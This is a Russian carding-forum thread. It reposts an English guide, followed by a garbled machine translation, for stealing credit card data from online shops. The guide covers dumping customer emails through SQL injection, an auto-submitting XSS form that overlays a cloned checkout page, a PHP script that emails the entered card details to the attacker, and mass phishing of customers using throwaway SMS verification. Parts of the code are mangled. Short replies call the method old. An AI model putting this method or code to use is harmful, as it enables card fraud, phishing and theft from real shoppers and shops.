БЕСПЛАТНЫЙ МАНУАЛ по добыче СС

Нашёл мануал по добыче СС
Единственный Минус, нужно грамотно перевести
Get Fresh & Private CC’s Direct in Your Inbox Through XSS & SQL Injection
This is My Method for Getting Fresh CC info,
Sent Directly to an inbox of your choice!
First, you need to find yourself a vulnerable shop.
Won’t go into too many details here, this should be pretty drilled into your head by now.
You can do this with Google Dorks manually, or use tools like WebCruiser, SQLi poison, etc.
What are you looking for is a shop with both SQLi vulnerabilities, and XSS vulnerabilities.
First, as you may have noticed on most databases containing CC info, it’s encrypted, MD5, FPE,
whatever it is it’s not feasible to work with that.
However, one thing you can work with is the current and former customer’s e-mail addresses.
Go ahead and rip the whole table with the customer information. If you’re lucky, you’ll get at least 10,000 e-mail addresses or more.
Next, you need to work with the XSS vulnerability. I’ve noticed the most common being POST vulnerability,
so I’ll go that route, but you can incorporate it with FORM or whatever.
You can use the following code to make a redirect.html or whatever you wish to name it. This page will load the vulnerable website immediately,
with one exception, a giant IFRAME over it which of course is going to be another page You Make….
<html> <head> <script language=javascript> function submitPostLink() :zin:{ document.postlink.submit(); } </script> </head> <body onload="submitPostLink()"> <form action="http://www.XXXXXXXco...TextSearch.asp" name=postlink method="post"> <input type="hidden" name="NAMEOFVULNERABLEFIELD" value="<iframe src=&quot;Ecommerce Web Site Hosting and Streaming from YourHost.com width=&quot;800&quot;height=&quot;2400&quot; style=&quot;z-index: 0; position: absolute; top: 0; left: 0; overflow-y: hidden;&quot; frameborder=0 align=center></iframe>"> </form> </body> </html>


Go ahead and goto the checkout page for the site you’re working with,
and save the page to your hard drive, including all the subdirectory files and images (firefox does this auto).
Now, you need to edit the main file you just saved.
Search for «action=», and change the page following it to your third page you will make,
which will be the PHP mail form that will send your e-mail all the information someone fills in the form.

The code will look something like

<?php
$userinfo = "@com"; //your email here
$ip = getenv("REMOTE_ADDR");
$message .= "".$_POST***91;'firstname'***93;."\n";
$message .= "".$_POST***91;'lastname'***93;."\n";
$message .= "".$_POST***91;'org_name'***93;."\n";
$message .= "".$_POST***91;'telephone'***93;."\n";
$message .= "".$_POST***91;'fax'***93;."\n";
$message .= "".$_POST***91;'email'***93;."\n";
$message .= "---------------------------------------------\n";
$message .= "".$_POST***91p>

Поставил плюс, но тема эта пахана-перепахана.

da +

+

+++

Копатели откопали xD думал уж что-то новенькое))

Современные браузеры на такую хрень отреагируют. Будет показано сообщение, что страница не безопасна.

Тот же Chrome например

Получите прямой Fresh & Private CC в вашем почтовом ящике за счет XSS и SQL Injection
Это мой метод для получения пресной данные CC,
направляются непосредственно к почтовый ящик по вашему выбору!
Во-первых, вам нужно найти сами уязвимы магазин.
Не будем вдаваться в слишком много деталей здесь, это должно быть довольно пробурена в голову сейчас.
Вы можете сделать это с Google Dorks вручную или использовать такие инструменты, как WebCruiser, SQLI яда и т.д.
Что вы ищете для это магазин с обеих SQLI уязвимостей и XSS уязвимостей.
Во-первых, как вы могли заметить, в большинстве баз данных, содержащих CC информацию, он зашифрован, MD5, ФПО,
то, что это это не представляется возможным работать с этим.
Тем не менее, одна вещь, которую может работать с это адреса электронной почты нынешними и бывшими клиента.
Идите вперед и копировать всю таблицу с информацией о клиенте. Если вам повезет, то вы получите, по крайней мере 10 000 адресов электронной почты или более.
Далее, вам нужно работать с уязвимостью XSS. Я заметил, наиболее распространенными из которых являются POST уязвимость,
так что я буду идти по этому пути, но вы можете включить его с формой или любой другой.
Вы можете использовать следующий код, чтобы сделать redirect.html или что вы хотите назвать его. Эта страница будет немедленно загрузить уязвимый сайт,
с одним исключением, гигант IFRAME над ним, который, конечно, будет другая страница You Make ....
< HTML > < голова > <скриптовый язык = Javascript > функция submitPostLink ( ) : Zin : { документ . postlink . представить ( ) ; } </ SCRIPT> </ голова > < тело onload = "submitPostLink ()" > < действие формы = " HTTP: //www.XXXXXXXco...TextSearch.asp " имя = postlink Метод = "Сообщение" > < тип входного = "скрытые" Имя = "NAMEOFVULNERABLEFIELD" значение = "<IFRAME SRC = & Quot Хостинг Электронная торговля Веб-сайта и в потоковом режиме с YourHost.com Ширина = & Quot; 800 & Quot; высота = & Quot; 2400 & Quot; стиль = & Quot; г-индекс: 0; позицию: абсолютная; сверху: 0; слева: 0; переполнение-й: скрытый; & Quot; frameborder = 0 выровнять = центр> </ IFRAME> " > </ образуют > </ тело > </ HTML >


Идите вперед и Перейти на страницу оформления заказа на сайте, вы работаете с,
и сохраните страницу на жестком диске, включая все поддиректории файлов и изображений (Firefox делает это авто).
Теперь, вам нужно отредактировать Основной файл, который вы только что сохранили.
Поиск «Action =», а также изменить страницы, следуя его на третьей странице вы сделаете,
которая будет PHP почты форма, которая будет посылать ваш адрес электронной почты вся информация кто заполняет форму.

код будет выглядеть примерно так

<PHP?
$ UserInfo = "com" ; // вашу электронную почту
















- $ IP " ;
$ заголовки = ":" От NAMEl <. @ ком> ;
$ заголовки . = $ _POST *** 91 ; 'eMailAdd " *** 93 .; " \ п " ;
заголовки $ . = "MIME -версии: 1,0 \ п " ;
почта ( $ UserInfo , $ вопросу , $ послание , $ заголовки ) ;

>?


Вы должны следовать этот код с некоторых HTML-код, который также выглядит как копия своего сайта, но с какой-то текст говоря что-то вдоль линий «извините, это предложение уже не доступны» или что-то в этом роде. Я объясню, почему сейчас.
После ввода все это вместе и отправить его на хост, вы хотите, чтобы сократить Youre перенаправить .html URL, вы можете использовать bit.ly или другой сервис сокращения.
Затем, вы можете отправить по электронной почте для всех клиентов адреса электронной почты (и вы должны быть творческие),
но что-то вдоль линий из них ценный клиент, и из-за этого, вы даете им одну из своих новейших продуктов всего за 99 центов! Убедитесь, что на вашей форме проверки, вы перечисляете пункт, который вы выбрали, чтобы они увидели это, когда они проверить.
отличный сервис для отправки массовых рассылок для свободного и нет суда или что-нибудь, что не является, если вы не взломали SMTP в использовании, targethero.com
Они позволяют отправлять неограниченное электронной почты, чтобы до 5000 различных контактов. Не плохо бесплатно.
Вам придется подтвердить свой аккаунт с мобильного телефона, но вы должны просто использовать receive-sms-online.com или freesmsreceive.com/index.php, где вы можете получить сообщения, отправленные на вас без регистрации.
Поверьте мне, если вы отправляете достаточно электронной почты бывших клиентов, особенно когда он находится в Здоровье и дополнение ниши,
если они получают предложение для 99 центов бутылка или чего-то, что они собираются Перейти всему, что!
Вот и все .... Теперь Будьте готовы для свежего и частного КК ......